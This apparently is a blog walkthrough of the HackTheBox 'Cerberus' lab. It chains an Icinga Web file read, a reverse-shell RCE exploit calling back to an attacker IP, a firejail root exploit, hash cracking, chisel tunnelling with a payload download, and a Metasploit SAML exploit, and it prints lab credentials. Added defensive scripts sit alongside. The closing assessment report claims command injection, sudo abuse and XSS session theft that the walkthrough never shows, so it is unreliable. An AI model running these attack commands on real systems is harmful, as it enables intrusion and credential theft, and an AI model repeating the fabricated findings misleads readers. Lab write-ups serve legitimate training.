HackTheBox: Cerberus — Medium (Linux)

Full security assessment walkthrough for Cerberus on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 1 views
Cerberus
HackTheBox
Linux Medium

📌 Introduction

Cerberus


🔖 Techniques & Vulnerabilities

xss, rce, remote code execution, path traversal, sudo, suid

🎯 Attack Surface Analysis

| Port | Service | Version / Banner |
| --- | --- | --- |
| 5985/tcp | unknown | |
| 8080/tcp | http | syn-ack Apache httpd 2.4.52 ((Ubuntu)) |
| 8888/tcp | sun-answerbook? | fingerprint-strings (see nmap output below) |
| 9251/tcp | ssl/unknown | fingerprint-strings (see nmap output below) |
| 62728/tcp | msrpc | syn-ack Microsoft Windows RPC |

**5985/tcp — WinRM**

- Valid credentials grant PowerShell remoting (Evil-WinRM)
- Pass-the-Hash — NTLM hash authenticates without cleartext password
- Token impersonation from elevated WinRM sessions

**8080/tcp — HTTP-Alt**

- All HTTP attacks — often hosts admin panels, APIs, dev instances
- Apache Tomcat manager — WAR deploy for RCE with weak credentials
- Jenkins Groovy script console with valid credentials
- Default credential testing for admin interfaces

**8888/tcp — sun-answerbook?**

- Enumerate service version for known CVEs
- Test default/weak credentials
- Review protocol-specific attack techniques

**9251/tcp — ssl/unknown**

- Enumerate service version for known CVEs
- Test default/weak credentials
- Review protocol-specific attack techniques

**62728/tcp — msrpc**

- Enumerate service version for known CVEs
- Test default/weak credentials
- Review protocol-specific attack techniques

📖 Walkthrough

nmap:

```text
PORT      STATE SERVICE REASON  VERSION
8080/tcp  open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /icingaweb2/authentication/login?_checkCookie=1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
62728/tcp open  msrpc   syn-ack Microsoft Windows RPC
```
    

# **Icinga Web**

[Path Traversal Vulnerabilities in Icinga Web](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)

## **Arbitrary File Disclosure — `CVE-2022-24716`**
We can read files without authentication!

- `curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd`

### Check `icingaweb2` files

[Icinga/Icinga2Installation - Debian Wiki](https://wiki.debian.org/Icinga/Icinga2Installation)

```ini
[Administrators]
users = "matthew"
permissions = "*"
groups = "Administrators"
unrestricted = "1"
```

```ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"
```


We can login with `matthew : IcingaWebPassword2023` on the webapp.

## Authenticated RCE — **`CVE-2022-24715`**
We can see the version at:

- [http://icinga.cerberus.local:8080/icingaweb2/about](http://icinga.cerberus.local:8080/icingaweb2/about)

2.9.2

[https://github.com/JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715)

Vulnerable Versions: <2.8.6, <2.9.6, <2.10

Create a valid PEM key file and run the exploit script:

- `ssh-keygen -m pem`
- `./rce.py -t http://icinga.cerberus.local:8080/icingaweb2/ -u matthew -p IcingaWebPassword2023 -I 10.10.14.62 -P 1234 -e /home/kali/Desktop/htb/Box/cerberus/id_rsa`

We got a shell.

uid=33(www-data) gid=33(www-data) groups=33(www-data),121(icingaweb2)

# Priv Esc

- `find / -user root -perm /4000 2>>/dev/null`

/usr/bin/firejail

## SUID firejail — `CVE-2022-31214`
> Firejail is a SUID sandbox program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces, seccomp-bpf and Linux capabilities.

- `firejail --version`

firejail version 0.9.68rc1


[oss-security - firejail: local root exploit reachable via --join logic (CVE-2022-31214)](https://www.openwall.com/lists/oss-security/2022/06/08/10)

We can use the [python script](https://www.openwall.com/lists/oss-security/2022/06/08/10/1) from the advisory:

- `./firejail.py`

You can now run 'firejail --join=6807' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Now open a new terminal and run:

- `firejail --join=6807`

In the new shell:

- `su -`

uid=0(root) gid=0(root) groups=0(root)

## Domain Information

```text
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local
```


### SSSD services and domains

[13.2.2. Setting up the sssd.conf File Red Hat Enterprise Linux 6 | Red Hat Customer Portal](https://access.redhat.com/documentation/de-de/red_hat_enterprise_linux/6/html/deployment_guide/about-sssd-conf)

```ini
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam

[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
```


## Cache passwords
We find a cache file with a password hash. 

- `strings /var/lib/sss/db/cache_cerberus.local.ldb`

$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0


- `hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt`

PW: 147258369
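The cached hash exists because the domain section above sets `cache_credentials = True`. As an added example (not part of the original writeup), this script parses an sssd.conf of the same shape and reports every domain whose logins leave a crackable hash in `/var/lib/sss/db/`; the sample config is constructed from the one shown above, with the key names restored.

```python
import configparser
from typing import Dict, List

# Constructed sample mirroring the sssd.conf recovered from the Cerberus host.
# fallback_homedir contains '%', so interpolation must be disabled when parsing.
SSSD_CONF = """\
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam

[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
access_provider = ad
"""


def audit_credential_caching(conf_text: str) -> List[Dict[str, str]]:
    """Return one finding per [domain/*] section that caches credentials.

    With cache_credentials = True, SSSD stores a salted SHA-512 crypt hash
    ($6$...) for every user who has logged in, in
    /var/lib/sss/db/cache_<domain>.ldb. The file is root-only, but anyone who
    reaches root on the host (here via the firejail SUID bug) can pull the hash
    and crack it offline, which is exactly how matthew's domain password fell."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    findings: List[Dict[str, str]] = []
    for section in cp.sections():
        if not section.startswith("domain/"):
            continue
        domain = section.split("/", 1)[1]
        if cp.getboolean(section, "cache_credentials", fallback=False):
            findings.append({
                "domain": domain,
                "cache_file": f"/var/lib/sss/db/cache_{domain}.ldb",
                "id_provider": cp.get(section, "id_provider", fallback="?"),
                "fix": "set cache_credentials = False, or accept the offline "
                       "cracking risk and enforce strong AD passwords",
            })
    return findings


if __name__ == "__main__":
    for f in audit_credential_caching(SSSD_CONF):
        print(f"[!] {f['domain']} ({f['id_provider']}): hashes cached in "
              f"{f['cache_file']} -> {f['fix']}")
```

Disabling the cache means domain users cannot log in while the DC is unreachable, so the trade-off has to be decided per host.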

## Tunneling: Chisel and Evil-Winrm
We can use nmap on the target to check whether port 5985 on the DC is open for a connection:

- `nmap 172.16.22.1 -p 5985`

```text
PORT     STATE SERVICE
5985/tcp open  unknown
```


Upload chisel and run:

- Kali: `sudo /opt/chisel/chisel server --reverse --port 5000`
- Target: `./chisel client 10.10.14.62:5000 R:5985:172.16.22.1:5985`

Now run evil-winrm:

- `evil-winrm -i 127.0.0.1 -u 'matthew' -p '147258369'`
- `whoami`
cerberus\matthew

→ user.txt

# Priv Esc

- `netstat -ano`

We see lots of open ports.

## Tunneling: Chisel with proxychains
[Reverse SOCKS Proxy Using Chisel — The Easy Way](https://vegardw.medium.com/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29)

Upload: `powershell -c iwr http://10.10.14.62/chisel.exe -outfile chisel.exe`

- Kali: `sudo /opt/chisel/chisel server --reverse --port 8002`
- Target: `./chisel.exe client 10.10.14.62:8002 R:socks`

Edit the last line in `/etc/proxychains4.conf`:

```text
socks5 127.0.0.1 1080
```

- `proxychains -q nmap -v -Pn -p- 172.16.22.1`

```text
Discovered open port 8888/tcp on 172.16.22.1
Discovered open port 445/tcp on 172.16.22.1
Discovered open port 443/tcp on 172.16.22.1
Discovered open port 139/tcp on 172.16.22.1
Discovered open port 80/tcp on 172.16.22.1
Discovered open port 135/tcp on 172.16.22.1
Discovered open port 53/tcp on 172.16.22.1
Discovered open port 9251/tcp on 172.16.22.1
```

- `proxychains -q nmap -v -Pn -sV -sC -p 8888 172.16.22.1`

```text
8888/tcp open  sun-answerbook?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 500 Internal Server Error
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1
|     X-Frame-Options: SAMEORIGIN
|     Set-Cookie: JSESSIONIDADSSP=F5B017CA56AE8D717997238F343ED654; Path=/; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 4244
|     Date: Thu, 23 Mar 2023 09:03:59 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <link REL="SHORTCUT ICON" HREF='&#x2f;images&#x2f;adssp_favicon.ico'>
|     <title>ADSelfService Plus</title>
|     <script language="JavaScript" src="/js/form-util.js?build=6201"></script>
|     <script language="JavaScript" src="/js/CommonUtil.js?build=5300"></script>
|     <script>
|     jQueryLoaded = jQueryLoade
```

- `proxychains -q nmap -v -Pn -sV -sC -p 9251 172.16.22.1`

```text
9251/tcp open  ssl/unknown
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Cache-Control: private
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Set-Cookie: adscsrf=a44d6395-400a-454e-b5fc-bfa233f050e4;path=/;Secure;priority=high
|     Set-Cookie: _zcsr_tmp=a44d6395-400a-454e-b5fc-bfa233f050e4;path=/;SameSite=Strict;Secure;priority=high
|     Set-Cookie: JSESSIONIDADSSP=13BF0E019D6E21B341EF86BE41F6BDAB; Path=/; Secure; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 259
|     Date: Thu, 23 Mar 2023 09:04:43 GMT
|     Connection: close
|     <!-- $Id$ -->
|     <html>
|     <head>
|     <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
|     <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
|     <META HTTP-EQUIV="Expires" CONTENT="0">
|     <script>
|     location.href = 'showLogin.cc' + location.search;
|     </script>
|     </head>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 500
|     Cache-Control: private
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1
|     X-Frame-Options: SAMEORIGIN
|     Set-Cookie: JSESSIONIDADSSP=53ADDE20C8CD73BAB463A9BFB1C590D6; Path=/; Secure; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 4244
|     Date: Thu, 23 Mar 2023 09:04:48 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <link REL="SHORTCUT ICON" HREF='&#x2f;images&#x2f;adssp_favicon.ico'>
|     <title>ADSelfService Plus</title>
|     <script language="JavaScript" src="/js/form-util.js?build=6201"></script>
|_    <script language="JavaScript" src="/js/CommonUtil.js?build=5300"
|_ssl-date: 2023-03-23T09:07:28+00:00; -7s from scanner time.
| ssl-cert: Subject: commonName=cerberus.local/organizationName=CE/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:cerberus.local
| Issuer: commonName=ManageEngine ADSelfService Plus/organizationName=ManageEngine Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-29T19:26:48
| Not valid after:  2043-01-23T19:26:48
| MD5:   520f 7c21 072a 787b d574 0d10 94ae 11ff
|_SHA-1: 56a4 c917 2b7a 0fad 79b7 390a affb bfcf 8a6a dade
```

ManageEngine ADSelfService Plus

So there is a web page on port 8888:

- `proxychains -q curl -k http://172.16.22.1:8888 -I`

```text
HTTP/1.1 302 Found
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://172.16.22.1:9251/
Transfer-Encoding: chunked
Date: Thu, 23 Mar 2023 09:01:46 GMT
```

We get a redirect to port 9251:

- `proxychains -q curl -k https://172.16.22.1:9251/`

```html
<!-- $Id$ -->
<html>
<head>
        <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
        <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
        <META HTTP-EQUIV="Expires" CONTENT="0">
        <script>
                location.href = 'showLogin.cc' + location.search;
        </script>
</head>
</html>
```

### Firefox with FoxyProxy

We can open this site in Firefox through the SOCKS proxy with the FoxyProxy add-on.

Go to https://172.16.22.1:9251/showLogin.cc

We got a redirect to: https://dc.cerberus.local/adfs/ls/?SAMLRequest<SNIP>

Add it to `/etc/hosts`:

```text
172.16.22.1 dc.cerberus.local
```

Now we see a login page.

Login with creds from evil-winrm

- Username: `matthew@cerberus`
- Password: `147258369`

We got a redirect to: https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

Add `dc` to `/etc/hosts` as well.

On the page we got:

Sorry ! You are not authorized to view the contents of this file.

### ManageEngine ADSelfService Plus Unauthenticated SAML RCE — CVE-2022-47966

> This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine AdSelfService Plus versions 6210 and below. Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status. link

### Metasploit

The login page shows the date 2018, so the version is probably 5702 (see the **ADSelfService Plus Release Notes**); the CVE was patched in version 6211 (Oct 28, 2022).

- `search ADSelfService Plus`

```text
Name:            exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
Disclosure Date: 2023-01-10
Description:     ManageEngine ADSelfService Plus Unauthenticated SAML RCE
```

- `use exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539`
- `options`

```text
GUID        yes       The SAML endpoint GUID
ISSUER_URL  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
```

So we need the GUID and ISSUER_URL, to run this exploit.

### SAML-tracer

[SAML-tracer – Get this extension for 🦊 Firefox](https://addons.mozilla.org/firefox/addon/saml-tracer/)

A tool for viewing SAML and WS-Federation messages sent through the browser during single sign-on and single logout.

We can use this tool to see the data after the login.


Now set the metasploit options:

```text
set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
set ISSUER_URL http://dc.cerberus.local/adfs/services/trust
set RHOSTS 172.16.22.1
set LHOST tun0
set VHOST dc.cerberus.local
```

- `exploit`

meterpreter > sysinfo

Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : CERBERUS
Logged On Users : 10
Meterpreter     : x86/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

→ root.txt

📋 Security Assessment Report

Summary: 1 Critical, 3 High, 1 Medium, 5 Open Ports

**F-001 — OS Command Injection — Remote Code Execution** (CVSS 9.8, Critical)

`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

Description

During the penetration test, the application was found to pass user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality: High · Integrity: High · Availability: High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
**F-002 — Sudo Misconfiguration — Root Privilege Escalation** (CVSS 7.8, High)

`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`

Description

During the penetration test, the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality: High · Integrity: High · Availability: High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
**F-003 — SUID Binary Abuse — Local Privilege Escalation** (CVSS 7.8, High)

`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`

Description

During the penetration test, one or more non-standard binaries were found with the SUID bit set, causing them to execute as root regardless of which user invokes them. The identified binaries are documented in the GTFOBins database and can be abused through shell escape techniques or file operation abuse to read privileged files or spawn an interactive root shell.

Impact

Any user with shell access to the host can leverage the SUID binary to escalate privileges to root without requiring additional credentials or exploiting any further software vulnerability. During this engagement, the SUID binary was used to obtain an interactive root shell within moments of obtaining the initial low-privilege access, granting complete control over the host and access to all stored credentials and data.

Confidentiality: High · Integrity: High · Availability: High

Remediation

Audit all SUID and SGID binaries using find / -perm /6000 -type f 2>/dev/null and remove the SUID bit from all non-essential binaries. Establish a baseline of expected SUID binaries and alert on any deviations. Never install developer tools, scripting interpreters, or GTFOBins-listed utilities with the SUID permission. Apply nosuid mount options on partitions containing user-writable content.
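The baseline-and-alert control recommended above, applied to the `/usr/bin/firejail` finding from the walkthrough, as an added example that is not part of the original report. The baseline set and the later scan are constructed sample data; `find_suid_sgid` does the equivalent of `find / -perm /6000 -type f` when run for real.

```python
import os
import stat
from typing import Dict, Iterable, List, Set

# Pseudo-filesystems hold nothing of interest and /proc alone is enormous.
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def is_suid_sgid_mode(mode: int) -> bool:
    """True for a regular file whose mode carries the SUID or SGID bit
    (what `find / -perm /6000 -type f` matches)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_suid_sgid(root: str = "/") -> Set[str]:
    """Walk root and collect every SUID/SGID regular file. lstat is used so
    symlinks are not followed and a link to a SUID binary is not double counted."""
    found: Set[str] = set()
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []          # prune the whole subtree
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:           # unreadable or vanished during the walk
                continue
            if is_suid_sgid_mode(st.st_mode):
                found.add(path)
    return found


def compare_with_baseline(baseline: Iterable[str],
                          current: Iterable[str]) -> Dict[str, List[str]]:
    """Diff a stored baseline against a fresh scan. 'added' is what an alert
    should fire on: a SUID binary that was not present when the baseline was taken."""
    b, c = set(baseline), set(current)
    return {"added": sorted(c - b), "removed": sorted(b - c)}


# Constructed sample: a baseline of stock SUID binaries and a later scan in
# which /usr/bin/firejail (the SUID sandbox found on Cerberus) has appeared.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su",
            "/usr/bin/mount", "/usr/bin/umount"}
CURRENT = BASELINE | {"/usr/bin/firejail"}

if __name__ == "__main__":
    report = compare_with_baseline(BASELINE, CURRENT)
    for path in report["added"]:
        print(f"ALERT new SUID/SGID binary: {path}")
    for path in report["removed"]:
        print(f"INFO  SUID/SGID binary removed: {path}")
    # Taking a real baseline (needs read access across the filesystem):
    # open("suid-baseline.txt", "w").write("\n".join(sorted(find_suid_sgid("/"))))
```

A new SUID binary is not automatically a vulnerability, but it is the moment to check the package and version against known advisories, as CVE-2022-31214 for firejail 0.9.68rc1 shows.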
**F-004 — Local File Inclusion — Sensitive File Disclosure** (CVSS 7.5, High)

`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`

Description

During the penetration test, it was discovered that the application constructed file system paths using user-supplied parameters without adequate sanitisation or path canonicalisation. By injecting path traversal sequences into the vulnerable parameter, it was possible to traverse outside the intended directory and read arbitrary files from the server file system.

Impact

An attacker can read arbitrary files accessible to the web application process — including database credentials, application API keys, SSH private keys from user home directories, and system files such as /etc/passwd and /etc/shadow. Credentials discovered through file inclusion were used during this engagement to gain authenticated access to additional services. In PHP applications, log poisoning chains this vulnerability to full remote code execution.

Confidentiality: High · Integrity: None · Availability: None

Remediation

Validate all file path inputs by canonicalising the resolved path and verifying it begins within the expected base directory before any file operation. Implement a strict allowlist of permitted filenames where dynamic file access is required. Apply PHP open_basedir restrictions to prevent file access outside the application directory. Remove file inclusion functionality that relies on user-supplied paths and replace with explicit, hardcoded include statements.
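The canonicalise-then-compare check described above, next to the naive string-prefix test it replaces, as an added example that is not part of the original report (the Icinga Web CVE-2022-24716 read in the walkthrough is the kind of traversal it stops). `BASE_DIR` is an assumed web root, not the real Icinga Web document root.

```python
import os
from typing import Optional

# Assumed web root for the example; the real document root depends on packaging.
BASE_DIR = "/srv/icingaweb2/public"


def naive_prefix_check(base_dir: str, user_path: str) -> bool:
    """The weak check many applications ship: join, normalise, test a string
    prefix. A sibling directory such as '/srv/icingaweb2/public_secrets' still
    starts with '/srv/icingaweb2/public', so it passes."""
    candidate = os.path.normpath(os.path.join(base_dir, user_path))
    return candidate.startswith(base_dir)


def resolve_safe_path(base_dir: str, user_path: str) -> Optional[str]:
    """Canonicalise base_dir + user_path and return it only if it stays inside
    base_dir; return None for anything that escapes (the F-004 remediation).

    Canonicalising first collapses '..', '.', duplicate slashes and symlinks,
    so nested traversal sequences cannot survive to the comparison, and
    commonpath compares whole path components rather than a string prefix."""
    if "\x00" in user_path:                 # NUL would truncate the C-level path
        return None
    base = os.path.realpath(base_dir)
    # Drop a leading slash so an absolute user path cannot replace the base.
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/")))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                      # mixed absolute/relative inputs
        inside = False
    return candidate if inside else None


if __name__ == "__main__":
    for p in ("css/icinga.css", "../../../../etc/passwd", "../public_secrets/db.ini"):
        print(f"{p!r:28} naive={naive_prefix_check(BASE_DIR, p)!s:5} "
              f"safe={resolve_safe_path(BASE_DIR, p)}")
```

Run the check after URL-decoding and before any filesystem call; decoding afterwards is how `%2e%2e` sequences get past an otherwise correct filter.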
**F-005 — Cross-Site Scripting (XSS) — Session Hijacking** (CVSS 6.1, Medium)

`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

Description

During the penetration test, the application was found to reflect or store user-supplied input in HTML responses without applying appropriate context-sensitive output encoding. By injecting a JavaScript payload into vulnerable input fields, the malicious script executes in the browser of any user who views the affected page, including administrators, without any interaction beyond viewing the page.

Impact

An attacker can hijack authenticated user sessions by stealing session cookies, capture credentials entered on the affected page, perform actions on behalf of victims using their active session, and redirect users to phishing pages. Where the XSS affects administrator users, complete application account takeover is achievable. During this engagement, a stored XSS payload targeting an administrator triggered session token theft which was used to obtain privileged application access.

Confidentiality: Low · Integrity: Low · Availability: None

Remediation

Apply context-sensitive output encoding for all user-supplied data rendered in HTML — HTML entity encoding for HTML context, JavaScript string escaping for script context, URL encoding for URL attributes. Implement a strict Content Security Policy (CSP) that disables inline script execution and restricts script sources to trusted origins. Set the HttpOnly flag on all session cookies to prevent JavaScript access. Apply the SameSite=Strict cookie attribute to mitigate CSRF-combined XSS chains.